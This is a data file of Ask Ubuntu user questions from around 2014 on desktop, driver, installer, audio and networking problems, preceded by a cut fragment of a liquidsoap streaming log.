`` q6600.home.lan '' , port = 8000 , password= '' ******** '' , mount = `` liq.ogg '' , mksafe ( input.alsa ( device= '' hw:1,0 '' ) ) ) ' 2014/05/24 19:55:12 > > > log start 2014/05/24 19:55:12 [ protocols.external:3 ] did n't find `` ufetch '' . 2014/05/24 19:55:12 [ protocols.external:3 ] found `` /usr/bin/wget '' . 2014/05/24 19:55:12 [ main:3 ] liquidsoap 1.0.0 2014/05/24 19:55:12 [ main:3 ] using : graphics= [ distributed with ocaml ] pcre=6.2.2 dtools=0.2.2 duppy=0.4.2 duppy.syntax=0.4.2 cry=0.2.2 mm=0.2.0 xmlplaylist=0.1.3 lastfm=0.3.0 ogg=0.4.3 vorbis=0.6.1 speex=0.2.0 mad=0.4.4 flac=0.1.0 flac.ogg=0.1.0 dynlink= [ distributed with ocaml ] lame=0.3.1 gstreamer=0.1.0 voaacenc=0.1.0 theora=0.3.0 schroedinger=0.1.0 gavl=0.1.4 bjack=0.1.3 alsa=0.2.1 ao=0.2.0 samplerate=0.1.1 taglib=0.2.0 magic=0.7.3 camomile=0.8.3 faad=0.3.0 soundtouch=0.1.7 portaudio=0.2.0 pulseaudio=0.1.2 ladspa=0.1.4 dssi=0.1.0 sdl=0.8.0 camlimages=4.0.0 lo=0.1.0 yojson=1.0.2 gd=1.0a5 2014/05/24 19:55:12 [ dynamic.loader:3 ] could not find dynamic module for aacplus encoder . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/cry.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/flac.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/pulseaudio.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/taglib.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/ogg.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/alsa.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/mad.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/voaacenc.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/lame.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/faad.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/flac_ogg.cmxs . 2014/05/24 19:55:12 [ dynamic.loader:2 ] loaded plugin file /usr/lib/liquidsoap/1.0.0/plugins/vorbis.cmxs . 2014/05/24 19:55:12 [ frame:3 ] using 44100hz audio , 25hz video , 44100hz master . 2014/05/24 19:55:12 [ frame:3 ] frame size must be a multiple of 1764 ticks = 1764 audio samples = 1 video samples . 2014/05/24 19:55:12 [ frame:3 ] targetting 'frame.duration ' : 0.04s = 1764 audio samples = 1764 ticks . 2014/05/24 19:55:12 [ frame:3 ] frames last 0.04s = 1764 audio samples = 1 video samples = 1764 ticks . 2014/05/24 19:55:12 [ threads:3 ] created thread `` generic queue # 1 '' . 2014/05/24 19:55:12 [ threads:3 ] created thread `` generic queue # 2 '' . 2014/05/24 19:55:12 [ threads:3 ] created thread `` src_4684 '' ( 1 total ) . 2014/05/24 19:55:12 [ src_4684:3 ] using alsa 1.0.25 . 2014/05/24 19:55:12 [ liq ( dot ) ogg:3 ] connecting mount liq.ogg for source @ q6600.home.lan ... 2014/05/24 19:55:12 [ src_4684:2 ] falling back on interleaved s16le 2014/05/24 19:55:13 [ liq ( dot ) ogg:3 ] connection setup was successful . 2014/05/24 19:55:13 [ threads:3 ] created thread `` wallclock_alsa '' ( 2 total ) . 2014/05/24 19:55:13 [ clock.wallclock_alsa:3 ] streaming loop starts , synchronized by active sources . 2014/05/24 19:55:13 [ mksafe:3 ] switch to src_4684 .
471605	how to completely remove unity ?	i have read many ways to purge unity on the internet but was unsuccessful in doing so . i have just one question - can i completely uninstall unity with lxde installed in my ubuntu 12.04 ? if yes , could you please guide me a little ? note : - i do n't want to install lubuntu because it does n't provide lts support . thanks in advance .
471607	.xauthority vs vnc server	on a 14.04 system i was installing vnc server with : apt-get install vnc4server -y -- force-yes my problem is that each time i run vncserver it is locking my .xauthority file in home directory making the next local logon attempt to default unity desktop impossible , it is looping . the solution is ctrlaltf1 , login to the terminal and deleting the .xauthority file , after that the login is working . what should i do to solve this issue preventing vncserver somehow to stop locking the .xauthority file every time ? many thanks in advance ! tomaso
471608	trusty on lenovo ideatab miix2	i would like to be able to install trusty on this windows tablet and replace windows completely . the only thing that i 've been able to find on it is that secure boot has to be disabled ( which i figured out ) , efi support is not available on newer versions of ubuntu and that it is extremely difficult if not impossible to get it running on devices like mine . ( http : //www.amazon.com/gp/product/b00f2entyi/ref=oh_details_o04_s00_i00 ? ie=utf8 & psc=1 ) can anyone please shed some light on this situation for me ? i 'm about to go crazy with windows 8 !
471609	amd ati radeon hd 4870 drivers on ubuntu 14.04	i have a computer with ubuntu 14.04 installed and i have a radeon hd 4870 ( rv770 ) video card and i want to install ati drivers but when i download it says this : distro version entered incorrectly or not supported , use -- listpkg to identify valid distro versions the latest drivers in amd web does n't mention my graphic card so i do n't know if it works ...
471610	tp_smapi on thinkpad t440	i have a thinkpad t440 with ubuntu 14.04 ( using i3wm ) . i have had trouble installing tp_smapi . i successfully installed it with dpkg -- ca n't remember whether i used apt or just downloaded it somewhere -- but i ca n't load the module . when i use modprobe on tp_smapi , i get this : '' modprobe : error : could not insert 'tp_smapi ' : no such device or address '' note that this is different from the error i get when i mistype the module name . i read somewhere that i might have to rebuild my kernel for it to work , but i 'd thought that the kernel i was using ( 3.13.0-24 ) had that already set up . has anyone gotten it to work ? i hate how lenovo manages the batteries !
471617	run blustacks or android to play clash of clans on ubuntu 13.4+	i am trying to get rid of the need to dual boot ubuntu and windows and one thing i can do with windows i can not do with linux is to run bluestacks to play android games my favourite one ow is clash of clans . i have tried different vm 's to run android emulators and virtual box but nothing works for clash of clans i can download the game to the vm from google play store but it fails to open if ubuntu can fix this by making a way to successfully install bluestacks on ubuntu or android with virtual box with out loading errors of all apps/games it would help the linux community to become less dependant of windows . thanks in advance ! go ubuntu !
471622	map double click to key combination	i 'm currently using xbindkeys and xdotool to map certain keyboard/mouse combinations to various keyboard shortcuts . now , i 'm trying to set up my mouse such that double-clicking the middle mouse button presses ctrl+w ( so i can close tabs in google chrome by simply double clicking the middle button ) . is it possible for xbindkeys to detect double clicks separately from single clicks ? if so , how would i do this , and if not , is there an alternative option available ?
471624	win 8.1 bootloader : your pc needs to be repaired/a device required for boot is not connected	hello fellow ubuntuans ! i 've got ubuntu 14.04 and windows 8.1 pro dual booting on my pc and everything has been fine until about a month ago . recently every time i reboot into windows after ubuntu i get a boot failure saying your pc needs to be repaired and that a device required to boot is n't connected . i reboot and it 's fine . i reboot another few times and as long as i do n't pick ubuntu in the bootloader screen it boots fine . once i boot into ubuntu , my first windows boot after that fails . now obviously the error is bogus ( since a mere reboot fixes it without me reconnecting this magical invisible device that is so important to booting ) , but i 'm wondering if maybe ubuntu or microsoft caused this with an update . things were definitely fine with ubuntu 13.10 , but now i 'm on 14.04 . the problem is i do n't often switch back & forth on this machine so i do n't know if maybe 14.04 is the culprit ( it defaults to windows as it 's my gaming machine . i boot linux if i 'm coding ) . is anyone else experiencing this ? does anyone have any ideas ? all i 've come across in terms of suggestions have been the various fixes for the boot loop issue , but there 's no loop here : once and it 's done ! thanks
471630	14.04 strange behavior of desktop icons	gnome desktop icon in terminal : gnome-desktop-item-edit ~/pulpit/ -- create-new and i have icon on my desktop , it works , but i can not move this item in other place of desktop , is there any solution for this problem ?
471631	how do i enable thumbnails for 'webm ' files ?	i have thumbnails for every other file type just not .webm . is there any way to enable them and if so , how would i do that ?
471632	gui problems : black boxes and bottom menu bar	after rebooting ubuntu 12.04.2 lts i unexpectedly saw menu bar not in the top ( as always ) but in the bottom . 'hidden ' menu bar in the top are still working , e.g . i can restart operating system . see screen : also keeping mouse on the side bar makes it black ( i ca n't make a screenshot because when i click prtsc button all screen becomes black ) . any suggestions ? ps : before this i installed kvm packages , do n't know if it can help ( i have n't been rebooting for a long time so i 'm not absolutely sure that it 's a reason ) . before posting question i tried this : sudo apt-get install -- reinstall unity sudo apt-get install -- reinstall ubuntu-desktop but it did n't help . update : issue was resolved . thanks to @ bain , apt-get update & & apt-get dist-upgrade works perfect !
471633	uninstall scangearmp	i want to uninstall `` scangearmp-mx340series-1.50-1-i386-deb '' . i have installed it using archive manager for ubuntu 14.04 lts . it is not working so i want to uninstall all installed items of the package . thank you
471639	media keys for volume control registers getting pressed multiple times	when i use my function keys for volume control , i only press it once , but the volume adjustment keeps happening and repeating itself without stopping and the notification for volume keeps blinking . if i want to increase the volume , for example , i only press it once , but the volume keeps increasing to full , and and notification for it keeps showing . it seems like the keypress is being registered to repeat infinite times . please help .
471642	`` back '' and `` install now '' buttons grayed out in 14.04 installer	the `` back '' and `` install now '' buttons are grayed out in the 14.04 installer . how do i restore them ?
471647	the disk drive / is not ready yet or not present	after installing wubi and ubuntu 14.4 when i attempt to log in i get âthe disk drive / is not ready yet or not presentâ then displays a command prompt from which i have no idea what to type next .
471648	on shutdown , system restarts	i have ubuntu 14.04 on my laptop . i do not have any other operating system . i have faced a problem . sometimes when i give command for shutdown it automatically restarts . however it is not frequent . but once in a while i see that problem . in 13.04 and 13.10 i faced it more often . any reason ? thanks in advance .
471649	how to ( easily ) setup a domain name ?	i have a fresh ubuntu server install and was wondering what i have to do in ubuntu to point the domain to the server so my website will display once setup . also what do i have to do on the domain side to set this up ?
471650	how to disable the popping sound when changing the volume ?	i 've just upgraded kubuntu from 12.04 to 14.04 , and ( as expected ) there are several annoyances . the first one i 've tried and failed to solve is the `` popping '' sound that is played whenever i change the volume , with the mixer or with the volume keys . i have enough with the osd , i do n't want any sound . i have `` no audio '' selected in the notifications setting , but that does n't help . something else i 've noticed , and do n't remember it was like this before : when a system tray menu is displaying , the volume keys do not work ...
471653	can not connect to the internet after uninstalling kubuntu-desktop	i wanted to remove kubuntu desktop and its deps as suggested here : sudo apt-get remove akonadi-facebook akregator amarok amarok-common amarok-utils apport-kde apturl-kde ark audiocd-kio bluedevil calligra-data calligra-libs colord-kde cryptsetup dolphin dragonplayer freespacenotifier gnupg-agent gnupg2 gpgsm gstreamer0.10-qapt gtk2-engines-oxygen gtk3-engines-oxygen gwenview ibus-qt4 kaccessible kaddressbook kamera kamoso kate kcalc kde-base-artwork kde-baseapps-bin kde-baseapps-data kde-config-gtk-style kde-config-tablet kde-config-telepathy-accounts kde-config-touchpad kde-style-oxygen kde-telepathy kde-telepathy-approver kde-telepathy-auth-handler kde-telepathy-contact-list kde-telepathy-data kde-telepathy-filetransfer-handler kde-telepathy-integration-module kde-telepathy-minimal kde-telepathy-send-file kde-telepathy-text-ui kde-wallpapers-default kde-window-manager kde-window-manager-common kde-workspace kde-workspace-bin kde-workspace-data kde-workspace-kgreet-plugins kde-zeroconf kdegames-card-data kdegames-data kdegraphics-strigi-analyzer kdemultimedia-kio-plugins kdenetwork-filesharing kdepasswd kdepim-kresources kdepim-strigi-plugins kdesudo kexi khelpcenter4 kinfocenter klipper kmag kmail kmenuedit kmix kmousetool knotes konsole kontact korganizer kpat kppp krdc krita krita-data ksnapshot ksysguard ksysguardd ksystemlog ktorrent ktorrent-data kubuntu-default-settings kubuntu-desktop kubuntu-docs kubuntu-firefox-installer kubuntu-netbook-default-settings kubuntu-notification-helper kubuntu-web-shortcuts kvkbd kwalletmanager libassuan0 libaudiocdplugins4 libbluedevil1 libcalendarsupport4 libchm1 libcln6 libdebconf-kde0 libepub0 libeventviews4 libfftw3-3 libgpgme++2 libgps20 libgrantlee-core0 libgtlcore0.8 libgtlfragment0.8 libibus-qt1 libincidenceeditorsng4 libindicate-qt1 libkateinterfaces4 libkblog4 libkcompactdisc4 libkdcraw-data libkdcraw21 libkdecorations4abi1 libkdegames6 libkdepim4 libkdepimdbusinterfaces4 libkdgantt2 libkephal4abi1 libkexiv2-11 libkexiv2-data libkipi-data libkipi9 libkleo4 libkmanagesieve4 libkonq-common libkonq5-templates libkonq5abi1 libkontactinterface4 libkpgp4 libkrossui4 libksane-data libksane0 libksba8 libkscreensaver5 libksgrd4 libksieve4 libksieveui4 libksignalplotter4 libktnef4 libktorrent-l10n libktorrent4 libktpchat0 libktpcommoninternalsprivate3 libkunitconversion4 libkwineffects1abi4 libkwinglutils1abi1 libkwinnvidiahack4 libkworkspace4abi2 liblastfm1 liblightdm-qt-2-0 libllvm3.0 libloudmouth1-0 libmailcommon4 libmailimporter4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmuonprivate1 libmygpo-qt1 libokularcore1abi1 libopenal-data libopenal1 libopenconnect2 libopenctl0.8 libopenjpeg2 libopenshiva0.8 libplasma-geolocation-interface4 libplasmaclock4abi3 libplasmagenericshell4 libpoppler-qt4-4 libprocesscore4abi1 libprocessui4a libqalculate5 libqalculate5-data libqca2-plugin-ossl libqgpgme1 libqimageblitz4 libqoauth1 libqtglib-2.0-0 libqtgstreamer-0.10-0 libqtgstreamerui-0.10-0 libqtscript4-core libqtscript4-gui libqtscript4-network libqtscript4-sql libqtscript4-uitools libqtscript4-xml libqtshiva0.1 libreoffice-kde libreoffice-style-oxygen libruby1.9.1 libsolidcontrol4abi2 libsolidcontrolifaces4abi2 libspnav0 libsyndication4 libtag-extras1 libtaskmanager4abi3 libtelepathy-logger-qt4-1 libtelepathy-qt4-2 libtemplateparser4 libweather-ion6 libyaml-0-2 libzip2 lightdm-kde-greeter muon muon-installer muon-notifier muon-updater okular okular-extra-backends oxygen-cursor-theme partitionmanager pinentry-gtk2 pinentry-qt4 plasma-dataengines-addons plasma-dataengines-workspace plasma-desktop plasma-netbook plasma-scriptengine-python plasma-widget-facebook plasma-widget-folderview plasma-widget-kimpanel plasma-widget-menubar plasma-widget-message-indicator plasma-widget-networkmanagement plasma-widget-telepathy-chat plasma-widget-telepathy-presence plasma-widgets-addons plasma-widgets-workspace plymouth-theme-kubuntu-logo plymouth-theme-kubuntu-text print-manager python-pyudev python3-pykde4 python3-pyqt4 python3-sip qapt-deb-installer quassel quassel-data rdesktop rekonq ruby ruby1.9.1 skanlite software-properties-kde systemsettings tasks-icons ubuntu-release-upgrader-qt usb-creator-kde userconfig & & sudo apt-get install ubuntu-desktop ... but now , i do n't have any graphical interface and the internet does n't work anymore . what can i do ? where should i start the debug ? i think that some important packages were removed . i have terminal access , and i can copy files from another computer that is connected to the internet ( if this is needed ) . is there any way to repair it via an installation cd/dvd ?
471655	how to index system setting in kupfer ?	i am running ubuntu 14.04. and installed kupfer 208 . for some reason i can not search and launch the applications from system settings such as display or appearance . the unity launcher finds all of them . i looked through the settings and list of plug-ins but could not find out how to index the system setting .
471656	will a parallel port software protection dongle work when running windows in a vm ?	currently running w2k . recent hard drive failure caused loss of many tweaks that made the os almost usable . seriously considering ubuntu for browsing and email . do n't really want a dual boot setup so i 'm leaning toward vm on ubuntu . i have several windows applications that i must use . one is edgecam , a cad/cam program that uses a physical parallel port dongle and opengl graphics . i guess my question would be : will the dongle be recognized when running the program on a vm ? any insight would be greatly appreciated .
471659	what will happen if i bump the usb drive ubuntu is running from ?	i am considering creating a live ubuntu usb drive and running ubuntu just from it . so , what bad things would happen if i was running ubuntu and doing stuff and my flash drive got bumped out of socket ? i 'm pretty certain that i 'd lose whatever i had n't saved , but what other corruptions or disasters might occur ? and are there settings that could be set to minimize the damage ? can anyone help me know the risks ? i 'd rather not just wait and find out .
471664	execute script as root on global hotkey independent of logged in user ?	desired scenario : upon system boot , a bash script is loaded which listens for a specific global keypress , independent of logged in user , also listening in the lock screen . upon a specific keypress , a script is executed ( invisibly , by the script running as as service ) with root permission . is this possible ?
471675	sound icon missing from top menu	the sound icon from the top menu bar is missing . it does however appear on the login screen and the guest account . i can still adjust my volume using keyboard keys but i liked the sound icon because it let me control rhythmbox . i noticed there are a lot of questions about this issue but all of the answers say to run $ gnome-sound-applet & which does not seem to work . does anybody know how i can fix this ? edit : running `` gsettings reset com.canonical.indicator.sound visible '' fixed the problem
471676	send music to upnp device from pc	i have a new arcam airdac ( http : //www.arcam.co.uk/products , rseries , wireless-dacs , airdac.htm ) attached to my stereo which has upnp support . i would like to send audio from my 14.04 pc to the box itself and to this end installed rygel upon my system to help but it has n't . i have created a new sound device in pulseaudiopreferences and selected it from inidcator-sound-switcher but here i become stuck . the sound is heading to the new sound device as the volume can be seen to go up and down from pulseaudiovolumecontrol but no sound comes from the stereo downstairs . the problem , as i see it , is the new device has no idea where to send the music as the arcam has n't been chosen from any program . so - i installed bubbleupnp and plex . my music has been imported into the later and the former can see both the arcam as a renderer and the plex as the media server . installing the bubbleupnp program on my android tablet allowed me to send music and all seemed good until i started playing aiff and alac music and it all stopped . no suitable decoding device . so that scuppered that route . so here i am and stuck . how can i tell ubuntu to use the arcam as a renderer to play music through when the albums are played from rhytmnbox , tomahawk , clementine or other ? clementine would be my preferred client as there is a usable remote control program for the tablet . can anyone help me fix this or advice another way to do what i would like ?
471687	avconv on multiple threads	is it possible to run jobs on multiple processor or threads to speed up avconv ? is there a feature in progress , if not i wonder why ?
471691	cant connect ot internet with latest version of ubuntu	i want to be a frontweb developer and i was advised to install ubuntu . i 've tried some ubuntu versions before ( only live cds to try ) but i never really like it . after a long day to even install ubuntu i finally got it done . but immediately i noticed that there was no internet -- > cable unplugged . so i got back to windows and tried to find solution online . i managed to install the latest drivers of my mainboard utp port realtek pcie gbe family controller . of course i still didnt got internet after installing them . i also was quite furious about the grub2 and i really wanted to delete ubuntu and grub2 . to do that i had to boot in to ubuntu once again ( according to the internet ) . but now , miraculously , internet worked ( i was so happy ) . i fooled around a bit and installed sublime text , localhost , github etc . then i booted back to windows to play a game and after when i went back to finalize my ubuntu settings , internet fails again . how can i fix this ? lspci -nnk 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0100 ] ( rev 09 ) subsystem : asrock incorporation device [ 1849:0100 ] 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0112 ] ( rev 09 ) subsystem : asrock incorporation device [ 1849:0112 ] kernel driver in use : i915 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) subsystem : asrock incorporation device [ 1849:1c3a ] kernel driver in use : mei_me 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c2d ] kernel driver in use : ehci-pci 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1892 ] kernel driver in use : snd_hda_intel 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) kernel driver in use : pcieport 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) kernel driver in use : pcieport 00:1c.6 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 7 [ 8086:1c1c ] ( rev b5 ) kernel driver in use : pcieport 00:1c.7 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 8 [ 8086:1c1e ] ( rev b5 ) kernel driver in use : pcieport 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c26 ] kernel driver in use : ehci-pci 00:1f.0 isa bridge [ 0601 ] : intel corporation z68 express chipset family lpc controller [ 8086:1c44 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c44 ] kernel driver in use : lpc_ich 00:1f.2 ide interface [ 0101 ] : intel corporation 6 series/c200 series chipset family 4 port sata ide controller [ 8086:1c00 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c00 ] kernel driver in use : ata_piix 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c22 ] 00:1f.5 ide interface [ 0101 ] : intel corporation 6 series/c200 series chipset family 2 port sata ide controller [ 8086:1c08 ] ( rev 05 ) subsystem : asrock incorporation device [ 1849:1c08 ] kernel driver in use : ata_piix 02:00.0 pci bridge [ 0604 ] : asmedia technology inc. asm1083/1085 pcie to pci bridge [ 1b21:1080 ] ( rev 01 ) 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : asrock incorporation motherboard ( one of many ) [ 1849:8168 ] kernel driver in use : r8169 05:00.0 usb controller [ 0c03 ] : etron technology , inc. ej168 usb 3.0 host controller [ 1b6f:7023 ] ( rev 01 ) subsystem : asrock incorporation device [ 1849:7023 ] kernel driver in use : xhci_hcd lsmod module size used by nls_iso8859_1 12713 1 usb_storage 62209 1 bnep 19624 2 rfcomm 69160 0 bluetooth 395423 10 bnep , rfcomm joydev 17381 0 snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi intel_rapl 18773 0 x86_pkg_temp_thermal 14205 0 intel_powerclamp 14705 0 coretemp 13435 0 kvm_intel 143060 0 kvm 451511 1 kvm_intel crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 ghash_clmulni_intel 13259 0 aesni_intel 55624 241 aes_x86_64 17131 1 aesni_intel lrw 13286 1 aesni_intel gf128mul 14951 1 lrw glue_helper 13990 1 aesni_intel ablk_helper 13597 1 aesni_intel cryptd 20359 123 ghash_clmulni_intel , aesni_intel , ablk_helper snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq serio_raw 13462 0 lpc_ich 21080 0 snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi mei_me 18627 0 mei 82274 1 mei_me soundcore 12680 1 snd mac_hid 13205 0 parport_pc 32701 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid i915 783485 3 psmouse 102222 0 video 19476 1 i915 i2c_algo_bit 13413 1 i915 drm_kms_helper 52758 1 i915 r8168 400910 0 drm 302817 4 i915 , drm_kms_helper r8169 67581 0 mii 13934 1 r8169 lpconfig -a didnt work cat/etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback cat/etc/resolv.config # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten edit : tried alot of solutions , nothing works . ubuntu is even failing to execute 'sudo ./autorun.sh ' it says no such command . as im looking on the internet for solutions , i found out that a lot of people have problems with this ethernet chipset r8168 . no working solution has been posted yet though . can someone add me on skype please and help me ? or is it better to buy a pci card that 100 % works ( no realtek chipset of course ) , any thoughts on good and cheap ones that will work out of the box ? it is so odd that it only worked 1 time ( and i didnt do anything for that )
471693	skype audio capture	skype crashes with message `` audio capture problem '' on my system 76 with ubuntu 14.04 . the audio system checks out as ok under the lsystem test diagnostics . is theren a cure for this problem ?
471696	trying to install ubuntu 14.04 on non uefi computer	i am trying to install ubuntu 14.04 from a usb bootable disk and i 'm getting this error : ubuntu install error /casper/vmlinuz.efi read error @ 0 it 's a non uefi bios , i 'm guessing it 's because ubuntu install is booting into uefi mode , if so how to make it boot into legacy mode ? i also tried renaming vmlinuz.efi to without the .efi extension as i 've seen some others do and that did nothing . edit : the error pop 's up twice , once before the language selection menu and again when you try to select an option like 'try ubuntu ' or 'install ubuntu ' .
471698	where does ubuntu 14.04 install netbeans	i revise many posts about this topic , i note that ubuntu should install netbeans under : ln -s /usr/local/netbeans-y.y/ i browse /usr/local and i do n't find any netbeans known that i have installed two versions of netbeans
471700	what ubuntu image should i download to install on my windows rt surface tablet ?	i want to install ubuntu on my windows rt surface tablet . it has 2gb of ram and a 16gb hdd . what version should i download ?
471701	i need a portable os on usb that can save document changes to the usb	i am trying to help a charity that has workers in nepal . they have received a bunch of old laptops with out hard drives . is it possible to create a usb with ubuntu as a bootable operating system and have documents save to the usb ?
471702	wo n't progress after clicking 'install now '	i became interested in linux a few days ago and wanted to give ubuntu 12.04 desktop a try . however , i am stuck on this page during installation and it gives me an error after i click 'install now ' . i tried installation using both usb and cd ( 2x speed ) . here are the following screen shots when asked for details . it also gives me an error when i try using the advanced options instead . i use dell inspiron 15 ( 3521 ) windows 7 64-bit ; intel pentium cpu 2127u @ 1.90ghz with 4.0gb ram . i used gparted live cd to partition my hard drive . i did n't understand fully what i was doing but i typed in sudo apt-get install mdadm in an effort to resolve a problem similarly faced by other users -- it did not work . your help is much appreciated . thank you ! edit : i referred to ubuntuhashes and turns out that the output from typing md5sum in terminal is different from that of the list . i tried other iso 's from mirrors and they are all different from the ones i have compared with . please help me : /
471703	asus kpge-d16 with adm 6344 running ubuntu 12.04 very slow processing	i set this machine up as a workstation specifically for cfd work . i have 64g memory , 24 cores processing , and fastest disks available . running the same cfd model on my windows quad core notebook ( slower processor and linux applications ported to windows ) is 50 % faster than anything i can do on the asus . i used cpufrequtil to try to directly control cpu speed , but virtually no change . are there some secret settings or utilities that will speed up this sudo-beast ? i suspect the cpus are loafing along at some slow speed as the fans do n't even speed up in the middle of calculations . thanks in advance .
471712	how can i build a desktop rig with awareness of linux driver support ?	i 've been plagued by driver problems with each of the three laptops on which i 've tried to install ubuntu , usually because of nvidia optimus problems ( somewhat solved by bumblebee but not quite ) . now i 'm thinking of investing in building a desktop , but i 'm a bit afraid of doing so because i 'm not sure if what i build will be able to support 3 screens and good audio output . how can i choose my graphics cards and audio cards with to ensure good driver support with linux ? is there an established way of checking compatibility other than looking things up on forums card by card ? or is this unnecessary , and support woes are more a laptop than a desktop problem ?
471713	xfce4-power-manager does not open	i recently changed my de from unity to xfce . i really enjoyed it , but the power manager does n't work . when i try to open it from the settings menu , i get the following error : unable to connect to xfce power manager did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . when i try to run it from the command line , it simply does nothing . i found some other solutions where people said to try running xfce4-power-manager -- no-daemon ( here : xubuntu 13.10 xfce4-power-manager not working ) , but then i get the following messages : ( xfce4-power-manager:23973 ) : xfce4-power-manager-warning ** : could not map keysym 1008ffa8 to keycode ( xfce4-power-manager:23973 ) : xfce4-power-manager-warning ** : 'checkauthorization ' failed with action org.freedesktop.udisks.drive-set-spindown is not registered and then the shell halts until i hit ctrl+c . then i read that this is a known bug and the best solution was to downgrade to a previous version of the power manager . i tried using aptitude for this , but it complained that every version i wanted did not exist , even if i was taking the version numbers from the xfce4-power-manager repository . the next thing i tried was to download the package and install it myself . but when i tried to configure , the script told me some libraries were missing , even though they are installed : *** the required package libxfconf-0 was not found on your system . *** please install libxfconf-0 ( atleast version 4.6.0 ) or adjust *** the pkg_config_path environment variable if you *** installed the package in a nonstandard prefix so that *** pkg-config is able to find it . i was told that library is already pre-installed in ubuntu . then i tried using the gnome-power-manager . even though it is installed , when i try to run it from the command line , it says there is no such program . and it would also not appear in the xfce settings menu , which i would like .
